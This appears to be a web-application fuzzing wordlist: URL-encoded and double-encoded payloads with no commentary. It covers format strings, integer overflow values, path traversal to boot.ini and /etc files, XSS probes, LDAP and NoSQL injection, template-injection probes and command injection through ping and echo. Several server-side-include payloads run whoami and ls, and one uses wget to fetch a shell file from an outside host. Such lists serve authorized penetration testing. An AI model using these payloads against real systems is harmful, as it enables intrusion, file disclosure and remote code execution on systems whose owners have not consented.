13333337
%5C+
%245
%25%2Bv
%5Cn
%250a
%25xyz
%2500
%5Cb
%25.-1f
%7B%22%22%7D
%250c
%240
%7B%5C%27%5C%27%7D
%255c
%241
%5Cf
%244
%248
%5Ct
%7Bnone.__dict__%7D
%249
%243
%25.2f
%7B%5C%22%5C%22%7D
%7B0%7D
%25x
%247
%25d
%242
%25s
%5C0
%2508
%25.00f
%7B%24this%7D
%246
%25b
%7B%7B%7D.__dict__%7D
%25.9999999999f
%2509
%25v
%25f
%7B%27%27%7D
%7Bthis%7D
%5Cr
%25.0f
%7Bself%7D
%7B%60%60%7D
%7B%27%27.__class__%7D
%250d
%5C%5C
9223372036854775808
79228162514264337593543950336l
32768
4294967295
2147483647
0x481b49d0f8d5a3e7f821066157c37c
9223372036854775807
1.79769313486e%2B308
128
2139095040
%25z%25z%25z%25z%25z%25z%25z%25z%25z%25z%25z%25z%25z
-139333426276771806651771
18446744073709551615
18446744073709551616
2.22507385851e-308
32767
2.07564741538e%2B16
255
%25.2f%25.2f%25.2f%25.2f%25.2f%25.2f%25.2f%25.2f%25.2f%25.2f%25.2f%25.2f%25.2f
16649142472222295162770764775
%25b%25b%25b%25b%25b%25b%25b%25b%25b%25b%25b%25b%25b
79228162514264337593543950336L
NaN
%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s
%25d%25d%25d%25d%25d%25d%25d%25d%25d%25d%25d%25d%25d
4294967296
-9223372036854775809
256
%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv%25%2Bv
-128
9223372036854775807
%25%23v%25%23v%25%23v%25%23v%25%23v%25%23v%25%23v%25%23v%25%23v%25%23v%25%23v%25%23v%25%23v
3.38800266804e%2B16
%25f%25f%25f%25f%25f%25f%25f%25f%25f%25f%25f%25f%25f
inf
%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f%25.9999999999f
65536
79228162514264337593543950336B
65535
127
-Infinity
%25z
%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x
-1.97684995314e%2B16
%25v%25v%25v%25v%25v%25v%25v%25v%25v%25v%25v%25v%25v
Infinity
2147483648
%25%23v
1.79769313486e%2B308
-2147483648
-32768
-2147483649
-129
-9223372036854775808
-32769
%21%27
%21%40%23%24%25%25%5E%23%24%25%23%24%40%23%24%25%24%24%40%23%24%25%5E%5E%2A%2A%28%28%29
%21%40%230%25%5E%230%23%23018387%40%230%5E%5E%2A%2A%28%28%29
-9223372036854775809
%22%3Exxx%3CP%3Eyyy
%22%3E%3Cscript%3E%22
%23
%23%27
%23xD%23xA
%23xD
%23xA%23xD
%23xA
%23%26apos%3B
%22%5Ct%22
%24NULL
%24null
%2500
%25
%2501%2502%2503%2504%250a%250d%250aADSF
%2500%2F
%2520
%252500
%2520%7C
%250a
%252A
%25250a
%252e%252e%252f
%252C
%26%2310%3B%26%2313%3B
%2A%26apos%3B
..%25bg%25qf
..%25c0%25af
--
%28%27%29
%2B%2500
%2A%27
-268435455
%2F
..%25%2535%2563
%257C
-1
%26quot%3B%3Bid%26quot%3B
%2F%252A
%26%2313%3B%26%2310%3B
%2A%7C
%2F%2500%2F
%2F%27
%26%2313%3B
..%25u2215
..%5C
-2
..%2F
..%25u2216
%253C%253F
%255C%2F
%255C
%2560
%26%2310%3B
2
0xfffffff
268435455
1
..%2525%2535%2563
..%25%2535c
-
0
-20
%26apos%3B
-1.0
%2F%26apos%3B
%2A
..%25255c
..%255c
00
2147483647
65536
1.0
%3B
%3C++script+%3E+%3C+%2F+script%3E
%3C%3F
%3Fx%3D%22
%3Fx%3D%7C
%3Fx%3D%3E
%3Fx%3D
%40%26apos%3B
A
%40%27
ABCD%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C
%3Cpre%3E%3C%21--%23exec+cmd%3D%22ls%22+--%3E%3C%2Fpre%3E
NULL
%3Cpre%3E%3C%21--%23echo+var%3D%22DATE_LOCAL%22+--%3E+%3C%2Fpre%3E
FALSE
TRUE
%3Cpre%3E%3C%21--%23exec+cmd%3D%22whoami%22--%3E%3C%2Fpre%3E
%3C%21--%23exec+cmd%3D%22ls%22+--%3E
%3Cpre%3E%3C%21--%23exec+cmd%3D%22dir%22+--%3E%3C%2Fpre%3E
%3C%21--%23echo+var%3D%22server_addr%22+--%3E
%3C%21--%23echo+var%3D%22script_name%22+--%3E
%3C%21--%23exec+cmd%3D%22%2Fbin%2Fls+%2F%22+--%3E
%3C%21--%23echo+var%3D%22server_admin%22+--%3E
%3C%21--%23exec+cmd%3D%22dir%22+--%3E
%3C%21--%23exec+cmd%3D%22wget+http%3A%2F%2Fwebsite.com%2Fdir%2Fshell.txt%22+--%3E
%3C%21--%23echo+var%3D%22script_uri%22+--%3E
%3C%21--%23echo+var%3D%22path_translated%22+--%3E
%3C%21--%23echo+var%3D%22script_url%22+--%3E
%3C%21--%23echo+var%3D%22netsite_root%22+--%3E
%3C%21--%23echo+var%3D%22path_info_translated%22+--%3E
%3C%21--%23echo+var%3D%22script_filename%22+--%3E
%3C%21--%23echo+var%3D%22site_htmlroot%22+--%3E
%3C%21--%23echo+var%3D%22request_uri%22+--%3E
%3C%21--%23echo+var%3D%22request_method%22+--%3E
%3C%21--%23echo+var%3D%22remote_user%22+--%3E
%3C%21--%23echo+var%3D%22http_client_ip%22+--%3E
%3C%21--%23echo+var%3D%22remote_ident%22+--%3E
%3C%21--%23echo+var%3D%22remote_addr%22+--%3E
%3C%21--%23echo+var%3D%22query_string_unescaped%22+--%3E
%3C%21--%23echo+var%3D%22path_info%22+--%3E
%3C%21--%23echo+var%3D%22page_count%22+--%3E
%3C%21--%23echo+var%3D%22remote_port%22+--%3E
%3C%21--%23echo+var%3D%22last_modified%22+--%3E
%3C%21--%23echo+var%3D%22path%22+--%3E
%3C%21--%23echo+var%3D%22path_translated%22+--%3E
%3C%21--%23echo+var%3D%22query_string%22+--%3E
%3C%21--%23echo+var%3D%22http_user_agent%22+--%3E
.locale_object
randomFile.asp
.current_template_name
randomFile.php
%3C%21--%23echo+var%3D%22remote_host%22+--%3E
randomFile.aspx
randomFile.php4
_self
randomFile.php5
.version
randomFile.php3
randomFile.txt
randomFile.shtml
randomFile.phtml
randomFile.shtm
randomFile.phtm
randomFile.pl
randomFile.jhtml
randomFile.py
randomFile.jsp
randomFile.cfm
randomFile.cfml
%22%5Cx00%22
randomFile.rb
%22%3Atest%22
%7B%221%22%3A%220%22%7D
%221%22
%7B%220%22%3A%22%5Cx00%22%7D
%7B%7D
%7B%220%22%3A%5B1%5D%7D
%7B%221%22%3A0%7D
%7B%220%22%3A%5B1%2C2%5D%7D
%7B%220%22%3A%5B%5D%7D
%7B%22%5Cx00%22%3A0%7D
%7B%220%22%3A%5B%221%22%2C%222%22%5D%7D
%7B%22%5Cx00%22%3A%5B%5D%7D
%7B%22%5Cx00%22%3A%220%22%7D
%7B%22%5Cx00%22%3A%5B1%5D%7D
%7B%22%5Cx00%22%3A%22%22%7D
%7B%22%5Cx00%22%3A%5B1%2C2%5D%7D
%7B%22_id%22%3A%221%22%7D
%7B%22id%22%3A%221%22%7D
%7B%22_id%22%3A1%7D
%7B%22uid%22%3A1%7D
%7B%22id%22%3A1%7D
%7B%22uid%22%3A%221%22%7D
%7B%22_uid%22%3A%221%22%7D
%7D
%7B%22toJSON%22%3A%22while%281%29%3B%22%7D
%7B%22toString%22%3A%22while%281%29%3B%22%7D
%7B%22Length%22%3A999999999999%7D
%7B%22length%22%3A999999999999%7D
%7B42%2A42%7D
42%2A42
%7B%7B%7B42%2A42%7D%7D%7D
%24%7B42%2A42%7D
%7B%7B%3D42%2A42%7D%7D
%23%7B42%2A42%7D
%3C%25%3D42%2A42+%25%3E
%24%7Bdonotexists%7C42%2A42%7D
%7B%7B42%2A42%7D%7D
%5B%26apos%3B%5D
%5B%27%5D
%5B%5B%24%7B42%2A42%7D%5D%5D
%7B%5Exyzm42%7D1764%7B%2Fxyzm42%7D
%5C
%5C%27
%5C0
%5C%26apos%3B
%5C00
%5C00%5C00
%5C%22blah
%5C0%5C0
%5C00%5C00%5C00
%5C%5C
%5C%5C%2F
%5C0%5C0%5C0
%5C%5C%5C%5C%3F%5C%5C
%5Ct
%5E%26apos%3B
%5C%5C%5C%5C%2A
%2501%2502%2503%2504%250a%250d%250aADSF
ABCD%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C
t
%23xA%23xD
%5E%27
xsstest%2500%22%3C%3E%27
%3C%2Ffoo%3E
%60
%23xD%23xA
%3Cfoo%3E%3C%2Ffoo%3E
%25s
%3B
PRINT
%29%29%29%29%29%29%29%29%29%29
PRINT+%40%40variable
%40variable
%2C%40variable
%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s
%25f
%25v
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
%25v%25v%25v%25v%25v%25v%25v%25v%25v
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
%26+ping+-i+30+127.0.0.1+%26
%7C+ping+-n+30+127.0.0.1+%7C
%60ping+127.0.0.1%60
%3B+ping+127.0.0.1+%3B
%26+ping+-n+30+127.0.0.1+%26
%3Becho+111111
%250a+ping+-i+30+127.0.0.1+%250a
null
id%2500
%7B%26apos%3B%7D
something%2500html
id%2500%7C
%7C
%7B%27%7D
%25ff%2513
%7D
%25ff%2515
%25ff%2517
%25ff%2514
%25ff%2516
%25ff%2555
%25ff%2554
%25ff%2556
%25ff%2518
%25ff%25f8
%25ff%2557
%25ff%25f9
%25ff%25fa
%25ff%25f7
%25ff%25fb
true
5e-324
false
5e-10
%26lt%3BTnn96%26gt%3B
0.00005
%26lt%3B%3FTnn96+%3F%26gt%3B
%26quot%3BXoiZR
1.7976931348623157e%2B308
%26apos%3BXoiZR
%26lt%3B%25+Tnn96+%25%26gt%3B
%26lt%3B%3F+Tnn96+%3F%26gt%3B
%5BTnn96%5D
%26lt%3B%25%3D+Tnn96+%25%26gt%3B
%28Tnn96%29
%7BTnn96%7D
%7B%3D+Tnn96%7D
%7B%7BTnn96%7D%7D
null
%7B%7B%3D+Tnn96%7D%7D
%25
%2A
%40
%24
%2B
-
-1
%3A
%3B
0.1
0
1
%2F%2F%2A
%2F
0.9
true
%40%2A
%2F%2F
%2A%2F%2A
false
%2526
%21
%252A%2528%257C%2528mail%253D%252A%2529%2529
%252A%257C
%2528
%2521
%2529
%26
%252A%2528%257C%2528objectclass%253D%252A%2529%2529
%257C
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2A%28%7C%28mail%3D%2A%29%29
%28
%2A%2F%2A
%29
%2F%2F
%2F
%40%2A
%2A%28%29%7C%26%27
%2F%2F%2A
%7C
admin%2A
%2A%29%28uid%3D%2A%29%29%28%7C%28uid%3D%2A
%2Fetc%2Fzedxrc
%2Fetc%2Fzedrc
%2Fetc%2Fzope-extfile.conf
%2Fetc%2Fzgv.conf
php%3A%2F%2F%2Fetc%2Fzedrc
%2Fetc%2Fzoph%2Fapache.conf
php%3A%2F%2F%2Fetc%2Fzgv.conf
php%3A%2F%2F%2Fetc%2Fzedxrc
php%3A%2F%2F%2Fetc%2Fzlibc.conf
php%3A%2F%2F%2Fetc%2Fzhcon.conf
php%3A%2F%2F%2Fetc%2Fzoidrc
..%2F..%2F..%2F..%2F..%2F..%2F
php%3A%2F%2F%2Fetc%2Fzonecheck%2Fafnic.profile
php%3A%2F%2F%2Fetc%2Fzonecheck%2Fde.profile
%22%22%22
%27%27%27
%22%22%22%22
%5C%2F
..%2F
.%21
%3F
%21
%25
.
%27%27%27%27
%60%60%60%60
%3A
.%2F
%5B%26apos%3B%5D
%5B%27%5D
%26lt
.%3F
%7C%7C
%26gt
%21%21
%3F%3F
%60%60%60
100%2C00
00100
100
%5C%26apos%3B
%26quote
%5C%27
%5C
%5C%22blah
%24100
%24-100
-100
100-
%2B100
100.00
100%2B
%C2%A3100
-%24100
%C2%A3-100
-%C2%A3100
%E2%82%AC-100
%E2%82%AC100
%28100%29
%28%29
%28%22100%22%29
%28100%2C101%29
%28%2C%2C%29
-%E2%82%AC100
%5B%5D
%28%22100%22%2C%22101%22%29
%5B100%5D
%5B%22100%22%5D
%5B100%2C101%5D
%5B%2C%2C%5D
%5B%22100%22%2C%22101%22%5D
%7B100%7D
%7B%2C%2C%7D
%7B%7D
%7B%22100%22%7D
%7B100%2C101%7D
%7B%22100%22%2C%22101%22%7D
NaN
99
101
Infinity
inf
-NaN
-Infinity
0b1100100
-inf
1e-50
0.00000000000000000000000000000000000000000000000001
100e0
%26hff
0x64
%26h00
100e1
100e-1
false
true
-1
0
%2B0
1
-0
None
null
%2B1
1%2C%2C0%2C%2C0
%2520%2509100
An+Array
100%2520%2500%2500
4294967295
2147483647
2147483648
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
-2147483649
4294967296
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
-2147483648
9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
nil
%2500
%2502
%2504
%2503
%2506
%2509
%2505
%2501
%250a
%250c
%25bf
%2508
%250e
%250d
%2507
-9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
%250b
%250d
%250a
none
Null
null
%250d%250a
nil
NULL
NIL
%250f
Nil
%5Cu0000
NONE
None
%5Cx00
u%2B0000
U%2B0000
%5C00
%5C000
u0000
0
%2500
2.07564741538e%2B16
16649142472222295162770764775
%5C0
-139333426276771806651771
3.38800266804e%2B16
-1.97684995314e%2B16
0x481b49d0f8d5a3e7f821066157c37c
9223372036854775808
9223372036854775807
1.79769313486e%2B308
2139095040
1.79769313486e%2B308
79228162514264337593543950336L
2.22507385851e-308
Infinity
79228162514264337593543950336l
79228162514264337593543950336B
NaN
-Infinity
-9223372036854775809
inf
4294967295
65536
18446744073709551615
255
65535
18446744073709551616
256
4294967296
127
32767
9223372036854775807
32768
128
2147483647
9223372036854775808
-128
-9223372036854775809
-32768
-9223372036854775808
administrator
-32769
-2147483649
2147483648
-2147483648
home
admin
about
portal
index
dashboard
-129
user
api
v2
users
v1
v3
health
root
page
test
main
.htaccess
ping
discover
desktop
help
search
contact
desk
core
primary
unkown
goto
true
false
none
content
files
undefined
declare
images
gallery
defined
ok
trace
proper
failure
fail
allow
improper
go
pass
missing
access
administrator
admin
logon
system
logoff
login
invalid
valid
fail
status
warning
service
test
info
demo
testing
debug
verbose
goto
locked
file
ok
unlock
lock
image
install
build
document
new
make
enable
%21%40%230%25%5E%230%23%23018387%40%230%5E%5E%2A%2A%28%28%29
%3Cz%3E%22z%27z%60%25%7D%7D%29z%24%7B%7Bz%5C
disable
%21%40%23%24%25%25%5E%23%24%25%23%24%40%23%24%25%24%24%40%23%24%25%5E%5E%2A%2A%28%28%29
%5Cu0020
+
%2B
%5Cu%7B0020%7D
%5C040
%252b
%5Cx20
42%2A42
%2520
%7B42%2A42%7D
%5C40
%7B%7B42%2A42%7D%7D
%23%7B42%2A42%7D
%7B%7B%7B42%2A42%7D%7D%7D
%24%7B42%2A42%7D
%3C%25%3D42%2A42+%25%3E
%7B%5Exyzm42%7D1764%7B%2Fxyzm42%7D
%7B%7B%3D42%2A42%7D%7D
%5B%5B%24%7B42%2A42%7D%5D%5D
%24%7Bdonotexists%7C42%2A42%7D
0
1
True
False
false
DEV.APP.SVRCONN
DEV.ADMIN.SVRCONN
true
SYSTEM.AUTO.RECEIVER
SYSTEM.ADMIN.SVRCONN
SYSTEM.AUTO.SVRCONN
SYSTEM.DEF.CLUSRCVR
SYSTEM.DEF.REQUESTER
SYSTEM.DEF.CLUSSDR
SYSTEM.DEF.RECEIVER
SYSTEM.DEF.SENDER
SYSTEM.DEF.SERVER
SYSTEM.DEF.SVRCONN
SYSTEM.FAIL
SYSTEM.ERROR
SYSTEM.DEBUG
SYSTEM.TRACE
debug
SYSTEM.OK
dump
SYSTEM.TRACK
_self
app.config
app.dump
app.self
app.debug
.this
_this
%24this
self
this
1229%5Cu00511345
1229%5Cx511345
1229%25511345
1229%23%26x51;1345
1229%511345
1229U+00511345
13333337
%25255c
%257Bnone.__dict__%257D
%25249
%2525d
%25246
%255Cn
%257B%255C%2527%255C%2527%257D
%2525s
%2525.0f
%255Cb
%257B%2527%2527%257D
%2525x
%2525b
%257B%2527%2527.__class__%257D
%255C%255C
%25250d
%255Cf
%2525.2f
%2525.-1f
%2525.9999999999f
%2525v
%257B%257B%257D.__dict__%257D
%2525f
%252500
%255Ct
%25248
%257Bthis%257D
%25241
%2525.00f
%25250c
%25242
%252509
%257B0%257D
%25244
%257B%2560%2560%257D
%257B%2524this%257D
%25245
%25243
%25240
%2525xyz
%252508
%25250a
%255C0
%257B%255C%2522%255C%2522%257D
%25247
%257B%2522%2522%257D
%255C+
%257Bself%257D
%255Cr
%2525%252Bv
2147483648
-139333426276771806651771
2139095040
%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv%2525%252Bv
18446744073709551616
9223372036854775807
4294967295
9223372036854775807
9223372036854775808
79228162514264337593543950336B
65535
%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f%2525.9999999999f
32767
127
1.79769313486e%252B308
255
32768
Infinity
79228162514264337593543950336l
128
NaN
0x481b49d0f8d5a3e7f821066157c37c
%2525f%2525f%2525f%2525f%2525f%2525f%2525f%2525f%2525f%2525f%2525f%2525f%2525f
2.22507385851e-308
-2147483648
1.79769313486e%252B308
%2525z%2525z%2525z%2525z%2525z%2525z%2525z%2525z%2525z%2525z%2525z%2525z%2525z
%2525d%2525d%2525d%2525d%2525d%2525d%2525d%2525d%2525d%2525d%2525d%2525d%2525d
65536
16649142472222295162770764775
18446744073709551615
-9223372036854775809
79228162514264337593543950336L
3.38800266804e%252B16
inf
-Infinity
2147483647
-128
-1.97684995314e%252B16
%2525z
4294967296
%2525x%2525x%2525x%2525x%2525x%2525x%2525x%2525x%2525x%2525x%2525x%2525x%2525x
%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s
%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f%2525.2f
%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v%2525%2523v
2.07564741538e%252B16
256
%2525b%2525b%2525b%2525b%2525b%2525b%2525b%2525b%2525b%2525b%2525b%2525b%2525b
%2525v%2525v%2525v%2525v%2525v%2525v%2525v%2525v%2525v%2525v%2525v%2525v%2525v
%2525%2523v
-9223372036854775808
-32769
-129
-2147483649
%2521%2540%2523%2524%2525%2525%255E%2523%2524%2525%2523%2524%2540%2523%2524%2525%2524%2524%2540%2523%2524%2525%255E%255E%252A%252A%2528%2528%2529
%2521%2527
%2521%2540%25230%2525%255E%25230%2523%2523018387%2540%25230%255E%255E%252A%252A%2528%2528%2529
9223372036854775808
-9223372036854775809
-32768
%2523
%2522%253Exxx%253CP%253Eyyy
%2522%253E%253Cscript%253E%2522
%2522%255Ct%2522
%2523%2526apos%253B
%2523%2527
%2523xA
%2523xD%2523xA
%2523xD
%2523xA%2523xD
%2524null
%252500
%2524NULL
%2525
%252501%252502%252503%252504%25250a%25250d%25250aADSF
%252500%252F
%252520
%25250a
%25252500
%252520%257C
%2525250a
%25252A
%25252e%25252e%25252f
%25255C
-1.0
..%255C
%252F%252500%252F
..%252525%252535%252563
..%2525u2215
%252F
..%2525bg%2525qf
%252F%25252A
..%25255c
..%2525u2216
00
%252F%2526apos%253B
%252F%2527
..%2525255c
..%2525%252535%252563
%25255C%252F
..%2525c0%2525af
..%252F
%2526%252310%253B%2526%252313%253B
%252A%2527
%25253C%25253F
%252A%2526apos%253B
--
%2526%252310%253B
%2526apos%253B
-
%2526%252313%253B
%25252C
-20
%252560
%252A%257C
%252B%252500
%2526%252313%253B%2526%252310%253B
..%2525%252535c
%2526quot%253B%253Bid%2526quot%253B
%2528%2527%2529
-268435455
%25257C
-2
%252A
-1
1.0
0xfffffff
2
0
1
2147483647
%253B
268435455
%253C%253F
%253Fx%253D%2522
%253C++script+%253E+%253C+%252F+script%253E
%253Fx%253D
%253Fx%253D%257C
65536
%253Fx%253D%253E
%2540%2526apos%253B
ABCD%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C
A
NULL
%253Cpre%253E%253C%2521--%2523exec+cmd%253D%2522ls%2522+--%253E%253C%252Fpre%253E
TRUE
FALSE
%253Cpre%253E%253C%2521--%2523echo+var%253D%2522DATE_LOCAL%2522+--%253E+%253C%252Fpre%253E
%253Cpre%253E%253C%2521--%2523exec+cmd%253D%2522dir%2522+--%253E%253C%252Fpre%253E
%253C%2521--%2523exec+cmd%253D%2522%252Fbin%252Fls+%252F%2522+--%253E
%253Cpre%253E%253C%2521--%2523exec+cmd%253D%2522whoami%2522--%253E%253C%252Fpre%253E
%253C%2521--%2523exec+cmd%253D%2522ls%2522+--%253E
%253C%2521--%2523echo+var%253D%2522server_addr%2522+--%253E
%253C%2521--%2523exec+cmd%253D%2522wget+http%253A%252F%252Fwebsite.com%252Fdir%252Fshell.txt%2522+--%253E
%253C%2521--%2523echo+var%253D%2522script_url%2522+--%253E
%253C%2521--%2523exec+cmd%253D%2522dir%2522+--%253E
%253C%2521--%2523echo+var%253D%2522server_admin%2522+--%253E
%253C%2521--%2523echo+var%253D%2522script_name%2522+--%253E
%253C%2521--%2523echo+var%253D%2522script_uri%2522+--%253E
%253C%2521--%2523echo+var%253D%2522netsite_root%2522+--%253E
%253C%2521--%2523echo+var%253D%2522script_filename%2522+--%253E
%253C%2521--%2523echo+var%253D%2522request_uri%2522+--%253E
%253C%2521--%2523echo+var%253D%2522path_translated%2522+--%253E
%253C%2521--%2523echo+var%253D%2522site_htmlroot%2522+--%253E
%253C%2521--%2523echo+var%253D%2522path_info_translated%2522+--%253E
%253C%2521--%2523echo+var%253D%2522remote_user%2522+--%253E
%253C%2521--%2523echo+var%253D%2522http_client_ip%2522+--%253E
%253C%2521--%2523echo+var%253D%2522request_method%2522+--%253E
%253C%2521--%2523echo+var%253D%2522remote_ident%2522+--%253E
%253C%2521--%2523echo+var%253D%2522remote_port%2522+--%253E
%253C%2521--%2523echo+var%253D%2522remote_addr%2522+--%253E
%253C%2521--%2523echo+var%253D%2522query_string_unescaped%2522+--%253E
%253C%2521--%2523echo+var%253D%2522remote_host%2522+--%253E
%253C%2521--%2523echo+var%253D%2522path_translated%2522+--%253E
%253C%2521--%2523echo+var%253D%2522query_string%2522+--%253E
%253C%2521--%2523echo+var%253D%2522path_info%2522+--%253E
%253C%2521--%2523echo+var%253D%2522path%2522+--%253E
%253C%2521--%2523echo+var%253D%2522page_count%2522+--%253E
%253C%2521--%2523echo+var%253D%2522last_modified%2522+--%253E
%2540%2527
.version
%253C%2521--%2523echo+var%253D%2522http_user_agent%2522+--%253E
.locale_object
.current_template_name
_self
randomFile.asp
randomFile.php
randomFile.php3
randomFile.php4
randomFile.php5
randomFile.txt
randomFile.aspx
randomFile.shtm
randomFile.shtml
randomFile.phtm
randomFile.cfm
randomFile.phtml
randomFile.pl
randomFile.py
randomFile.jsp
randomFile.jhtml
%2522%255Cx00%2522
randomFile.cfml
%25221%2522
%2522%253Atest%2522
%257B%257D
randomFile.rb
%257B%25221%2522%253A%25220%2522%257D
%257B%25220%2522%253A%2522%255Cx00%2522%257D
%257B%25221%2522%253A0%257D
%257B%25220%2522%253A%255B1%255D%257D
%257B%25220%2522%253A%255B%25221%2522%252C%25222%2522%255D%257D
%257B%25220%2522%253A%255B%255D%257D
%257B%2522%255Cx00%2522%253A0%257D
%257B%25220%2522%253A%255B1%252C2%255D%257D
%257B%2522%255Cx00%2522%253A%25220%2522%257D
%257B%2522%255Cx00%2522%253A%255B1%252C2%255D%257D
%257B%2522%255Cx00%2522%253A%255B%255D%257D
%257B%2522%255Cx00%2522%253A%2522%2522%257D
%257B%2522_id%2522%253A%25221%2522%257D
%257B%2522%255Cx00%2522%253A%255B1%255D%257D
%257B%2522id%2522%253A%25221%2522%257D
%257B%2522id%2522%253A1%257D
%257B%2522_id%2522%253A1%257D
%257B%2522uid%2522%253A1%257D
%257B%2522uid%2522%253A%25221%2522%257D
%257B%2522toJSON%2522%253A%2522while%25281%2529%253B%2522%257D
%257B%2522_uid%2522%253A%25221%2522%257D
%257D
%257B%2522toString%2522%253A%2522while%25281%2529%253B%2522%257D
%257B%2522length%2522%253A999999999999%257D
%257B%2522Length%2522%253A999999999999%257D
%257B42%252A42%257D
42%252A42
%257B%257B42%252A42%257D%257D
%257B%257B%257B42%252A42%257D%257D%257D
%2524%257B42%252A42%257D
%257B%257B%253D42%252A42%257D%257D
%253C%2525%253D42%252A42+%2525%253E
%2523%257B42%252A42%257D
%257B%255Exyzm42%257D1764%257B%252Fxyzm42%257D
%255B%2526apos%253B%255D
%2524%257Bdonotexists%257C42%252A42%257D
%255C
%255B%2527%255D
%255B%255B%2524%257B42%252A42%257D%255D%255D
%255C%2526apos%253B
%255C%2527
%255C%2522blah
%255C0
%255C00
%255C0%255C0
%255C%255C
%255C0%255C0%255C0
%255C00%255C00%255C00
%255C%255C%255C%255C%252A
%255Ct
%255C%255C%252F
%255E%2526apos%253B
%252501%252502%252503%252504%25250a%25250d%25250aADSF
%255C%255C%255C%255C%253F%255C%255C
%2523xA%2523xD
t
ABCD%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C%25258.8x%257C
%255E%2527
%2523xD%2523xA
%253C%252Ffoo%253E
xsstest%252500%2522%253C%253E%2527
%2560
PRINT
%253B
%2540variable
%2529%2529%2529%2529%2529%2529%2529%2529%2529%2529
%253Cfoo%253E%253C%252Ffoo%253E
%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s%2525s
%2525f
%2525s
PRINT+%2540%2540variable
%252C%2540variable
%255C00%255C00
%2525v
..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255Cboot.ini
%2525v%2525v%2525v%2525v%2525v%2525v%2525v%2525v%2525v
..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini
%253B+ping+127.0.0.1+%253B
%2526+ping+-i+30+127.0.0.1+%2526
%2526+ping+-n+30+127.0.0.1+%2526
%2560ping+127.0.0.1%2560
%25250a+ping+-i+30+127.0.0.1+%25250a
%257C+ping+-n+30+127.0.0.1+%257C
id%252500
id%252500%257C
null
%253Becho+111111
%257C
something%252500html
%257B%2526apos%253B%257D
%2525ff%252514
%257B%2527%257D
%257D
%2525ff%252515
%2525ff%252513
%2525ff%2525fb
%2525ff%2525f9
%2525ff%2525fa
%2525ff%252557
%2525ff%252556
%2525ff%2525f7
%2525ff%252555
%2525ff%252554
%2525ff%252517
%2525ff%252516
%2525ff%252518
%2526lt%253B%2525%253D+Tnn96+%2525%2526gt%253B
%2526lt%253B%2525+Tnn96+%2525%2526gt%253B
%255BTnn96%255D
%2526lt%253B%253FTnn96+%253F%2526gt%253B
%2526lt%253B%253F+Tnn96+%253F%2526gt%253B
%2526lt%253BTnn96%2526gt%253B
%2526apos%253BXoiZR
%2526quot%253BXoiZR
0.00005
5e-10
true
5e-324
1.7976931348623157e%252B308
%2525ff%2525f8
false
%257BTnn96%257D
%2528Tnn96%2529
%257B%253D+Tnn96%257D
%257B%257BTnn96%257D%257D
null
%257B%257B%253D+Tnn96%257D%257D
%252A
%2525
%2524
%252B
%2540
%253A
-
-1
0
%253B
0.1
1
0.9
true
%252F
false
%252F%252F
%2540%252A
%252A%252F%252A
%252521
%2521
%252529
%25252A%25257C
%252528
%25252A%252528%25257C%252528mail%25253D%25252A%252529%252529
%252526
%2526
%2529
%25257C
%2528
%252A%2528%257C%2528objectclass%253D%252A%2529%2529
%25252A%252528%25257C%252528objectclass%25253D%25252A%252529%252529
%252A%257C
%252A%2528%257C%2528mail%253D%252A%2529%2529
%252F%252F
%252A%252F%252A
%2540%252A
%252A%2528%2529%257C%2526%2527
%252F
%252F%252F%252A
admin%252A
%252A%2529%2528uid%253D%252A%2529%2529%2528%257C%2528uid%253D%252A
%257C
%252Fetc%252Fzedrc
%252Fetc%252Fzedxrc
%252F%252F%252A
%252Fetc%252Fzope-extfile.conf
php%253A%252F%252F%252Fetc%252Fzedrc
